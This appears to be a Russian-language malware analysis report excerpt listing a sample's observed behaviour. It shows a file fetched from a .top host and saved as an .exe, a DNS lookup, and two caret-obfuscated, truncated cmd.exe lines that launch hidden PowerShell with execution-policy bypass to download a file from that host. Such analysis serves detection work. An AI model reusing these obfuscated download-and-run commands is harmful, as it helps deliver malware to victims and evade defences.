Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Owe^r^shEll^.EXE ^-e^xeCUT^I^on^POl^I^CY^ bYpass -NOPr^OF^ilE -W^i^NdOWS^TYle HIDdE^n (NEw-obj^Ect^ S^Y^STEM.N^ET.WeBCl^iENT^)^.Down^loA^dfI^L^E(^'http://toagoores.top/read.php...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "P^Owe^r^shEll^.EXE ^-e^xeCUT^I^on^POl^I^CY^ bYpass -NOPr^OF^ilE -W^i^NdOWS^TYle HIDdE^n (NEw-obj^Ect^ S^Y^STEM.N^ET.WeBCl^iENT^)^.Down^loA^dfI^L^E(^'http://toagoores.top/read.php...' (со скрытым окном)